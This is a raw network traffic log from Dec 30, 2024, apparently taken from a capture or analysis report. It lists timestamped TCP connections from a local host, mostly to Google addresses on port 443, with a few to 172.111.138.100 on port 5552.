                                                                                                              Dec 30, 2024 11:35:57.195405960 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.202454090 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.202466965 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.202903986 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.202910900 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.375998974 CET44349746142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.376065016 CET49746443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.376097918 CET44349746142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.376136065 CET49746443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.376720905 CET49746443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.376760960 CET44349746142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.376806974 CET49746443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.377599001 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.377640963 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.377693892 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.378103018 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.378117085 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.447124004 CET44349749142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.447326899 CET49749443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.447554111 CET49749443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.447599888 CET44349749142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.447768927 CET44349749142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.447834969 CET49749443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.447834969 CET49749443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.448194027 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.448240042 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.448321104 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.448575020 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.448586941 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.458810091 CET44349748142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.458865881 CET44349748142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.458935976 CET49748443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.458935976 CET49748443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.458952904 CET44349748142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.458976030 CET44349748142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.459095001 CET49748443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.461138010 CET49748443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.461148024 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.461152077 CET44349748142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.461206913 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.461498022 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.461661100 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.461679935 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.606622934 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.606678009 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.606714010 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.606739044 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.606794119 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.606818914 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.607141018 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.607522011 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.607522011 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.607543945 CET44349750142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.608077049 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.608112097 CET49750443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.608140945 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.608290911 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.608489990 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:57.608505011 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.646455050 CET497585552192.168.2.4172.111.138.100
                                                                                                              Dec 30, 2024 11:35:57.651307106 CET555249758172.111.138.100192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.655374050 CET497585552192.168.2.4172.111.138.100
                                                                                                              Dec 30, 2024 11:35:57.671734095 CET497585552192.168.2.4172.111.138.100
                                                                                                              Dec 30, 2024 11:35:57.676577091 CET555249758172.111.138.100192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.996092081 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.996231079 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:57.996895075 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:57.997009993 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.016750097 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.016774893 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.017110109 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.017252922 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.017775059 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.051533937 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.051625013 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.052318096 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.052460909 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.058440924 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.058449984 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.058727026 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.059173107 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.059329987 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.059804916 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.060697079 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.060931921 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.061242104 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.061256886 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.063442945 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.063466072 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.103341103 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.207482100 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.207624912 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.208611012 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.208642006 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.209208965 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.209223032 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.365276098 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.365520000 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.365995884 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.366048098 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.366112947 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.366245031 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.367274046 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.367274046 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.367294073 CET44349753142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.367924929 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.367978096 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.368010998 CET49753443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.368146896 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.368696928 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.368710041 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.419085026 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.419166088 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.419199944 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.419245958 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.419878960 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.419922113 CET44349755142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.419967890 CET49755443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.420649052 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.420700073 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.420799971 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.421014071 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.421030998 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472207069 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472259998 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472280025 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.472315073 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472331047 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.472373009 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.472381115 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472424030 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.472430944 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472440958 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.472480059 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.475306034 CET49756443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.475346088 CET44349756142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.475833893 CET49764443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.475881100 CET44349764142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.475943089 CET49764443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.476126909 CET49764443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.476138115 CET44349764142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616735935 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616792917 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616822958 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.616853952 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616873026 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.616903067 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.616908073 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616930962 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.616945982 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.616962910 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.625734091 CET49757443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.625766039 CET44349757142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.626176119 CET49765443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.626224041 CET44349765142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.626406908 CET49765443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.626580954 CET49765443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:58.626600981 CET44349765142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.969384909 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.969481945 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:58.970169067 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:58.970221043 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.016738892 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.016834021 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.017210960 CET44349762142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.017364979 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.017718077 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.022882938 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.022993088 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.023674965 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.023730993 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.050729036 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.050770044 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.051156998 CET44349763142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.051218987 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.051757097 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.054102898 CET49764443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:59.054138899 CET49765443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:35:59.054167032 CET49763443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.054174900 CET49762443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.055500031 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.055541992 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.055608034 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.056499958 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.056559086 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.056667089 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.057200909 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.057221889 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.057339907 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.057353973 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.657543898 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.657602072 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.671586037 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.671744108 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.680062056 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.680088043 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.680263996 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.680269957 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.700156927 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.700170994 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:35:59.712975979 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:35:59.712984085 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.028669119 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.028742075 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.028846025 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.028914928 CET44349767142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.028963089 CET49767443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.029418945 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.029443979 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.029508114 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.029763937 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.029774904 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.029985905 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.030041933 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.030226946 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.030267000 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.030272961 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040394068 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040489912 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040502071 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040540934 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040548086 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040586948 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040610075 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040610075 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040622950 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040649891 CET44349766142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.040689945 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.040699959 CET49766443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.041300058 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.041379929 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.041436911 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.041804075 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.041845083 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.041857004 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.041898012 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.041907072 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.042040110 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.042048931 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.638701916 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.639130116 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.639183044 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.639607906 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.639646053 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.640012980 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.641366005 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.641381979 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.641669989 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.641793013 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.642543077 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.647624016 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.647638083 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.647991896 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.648078918 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.648513079 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.650574923 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.650810003 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.651443958 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.651830912 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.651874065 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.652035952 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.653244972 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.653250933 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.653518915 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.653738022 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.654084921 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.654099941 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.654346943 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.654457092 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:00.654556990 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.654865980 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:00.683332920 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.695328951 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.695346117 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:00.699368954 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.021008968 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.021188974 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.021209955 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.021367073 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.021444082 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.021512985 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.021512985 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.021531105 CET44349774142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.021835089 CET49774443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.022165060 CET49776443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.022209883 CET44349776142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.022592068 CET49776443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.022592068 CET49776443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.022628069 CET44349776142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.033440113 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.033562899 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.033572912 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.033698082 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.033744097 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.033792973 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.033873081 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.037184000 CET49772443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.037205935 CET44349772142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.038532019 CET49777443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.038577080 CET44349777142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.038810015 CET49777443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.039299965 CET49777443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:01.039323092 CET44349777142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.051539898 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.051601887 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.051713943 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.051738977 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.051947117 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.052683115 CET49771443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.052697897 CET44349771142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.053304911 CET49778443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.053328037 CET44349778142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.053735018 CET49778443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.054001093 CET49778443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.054011106 CET44349778142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.204699993 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.204746008 CET44349773142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.204818964 CET49773443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:01.204849005 CET44349773142.250.186.97192.168.2.4
